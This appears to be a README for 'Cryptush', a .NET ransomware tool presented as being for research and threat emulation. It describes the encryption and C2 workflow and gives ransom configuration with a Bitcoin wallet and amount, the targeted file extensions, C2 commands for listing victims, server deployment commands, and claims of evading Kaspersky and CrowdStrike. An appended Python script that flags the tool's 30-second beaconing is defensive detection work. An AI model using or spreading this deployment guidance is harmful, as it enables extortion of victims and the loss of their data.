An open-source ransomware tool written in .NET
The tool is intended for research and threat emulation purposes only. I'm not responsible for any malicious uses of this tool.
1- A symmetric AES (256-bit) key is generated.
2- Documents are collected from predefined directories, including their subdirectories.
3- The key is encrypted with a static public RSA key and sent to the C2 server.
4- The C2 server returns a GUID for identification and logs the details to CryptushServer.log.
5- The encryption key is then deleted from memory on the victim host, and a window is presented that includes a decryption option and a 24-hour timer.
- The ransomware will not run if there is no communication with the C2 server. A reconnect attempt is made every 30 seconds.
- Edit the app.config file inside the Cryptush folder with your details:
<add key="ServerIP" value="" />
<add key="ServerPort" value="443" />
<add key="Email" value="" />
<add key="BtcWalletAddress" value="bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh" />
<add key="BtcAmount" value="0.035" />
- Select the folders to be encrypted in Cryptush.cs, the default is:
public static string[] paths = {
- The default extensions are:
var extensions = new List<string> { ".xls", ".doc", ".ppt", ".pdf", ".txt" };
You can change them in Cryptush/lib/Collector.cs
You can view details about the encrypted victims using the "list" command (hostname, username, launch time, time left for payment, etc.).
You can view details about the encrypted files on each victim using the "files" command.
sudo dpkg -i packages-microsoft-prod.deb
sudo apt update
sudo apt install -y dotnet-runtime-5.0
sudo dotnet CryptushServer.dll --ip=* --port=443
- Kaspersky - PASS
- CrowdStrike - PASS
- Client - .NET Framework 4.8
- Server - .NET core 5.0
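
For detection engineering during an emulation exercise, the fixed 30-second reconnect interval noted above is a usable network signal. The following is an added example, not part of the Cryptush code base: it flags flows in a connection log whose gaps cluster tightly around a single interval. The log format, the addresses (documentation ranges) and the thresholds are assumptions, and the sample lines are constructed.

```python
from collections import defaultdict
from statistics import median

# Constructed sample connection log: epoch seconds, source, destination, port.
# 10.0.0.5 retries a placeholder address every ~30 s; 10.0.0.9 is ordinary traffic.
SAMPLE_LOG = """\
1000 10.0.0.5 203.0.113.10 443
1003 10.0.0.9 198.51.100.7 443
1030 10.0.0.5 203.0.113.10 443
1041 10.0.0.9 198.51.100.7 443
1060 10.0.0.5 203.0.113.10 443
1090 10.0.0.5 203.0.113.10 443
1121 10.0.0.5 203.0.113.10 443
1150 10.0.0.5 203.0.113.10 443
1333 10.0.0.9 198.51.100.7 443
1340 10.0.0.9 198.51.100.7 443
"""

def parse(log_text):
    """Group connection timestamps by (source, destination, port)."""
    flows = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        ts, src, dst, port = parts
        flows[(src, dst, int(port))].append(float(ts))
    return flows

def find_beacons(log_text, min_events=5, max_jitter=0.1):
    """Return flows whose inter-connection gaps cluster around one interval.

    A flow is flagged when it has at least min_events connections and every
    gap is within max_jitter (as a fraction) of the median gap.
    """
    hits = []
    for key, times in parse(log_text).items():
        times.sort()
        if len(times) < min_events:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        mid = median(gaps)
        if mid > 0 and all(abs(g - mid) <= max_jitter * mid for g in gaps):
            hits.append({"flow": key, "interval_s": mid, "events": len(times)})
    return hits

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

On the constructed log, only the 10.0.0.5 flow is reported, with an interval of 30 seconds; in production data the thresholds need tuning against legitimate periodic traffic such as update checks and health probes.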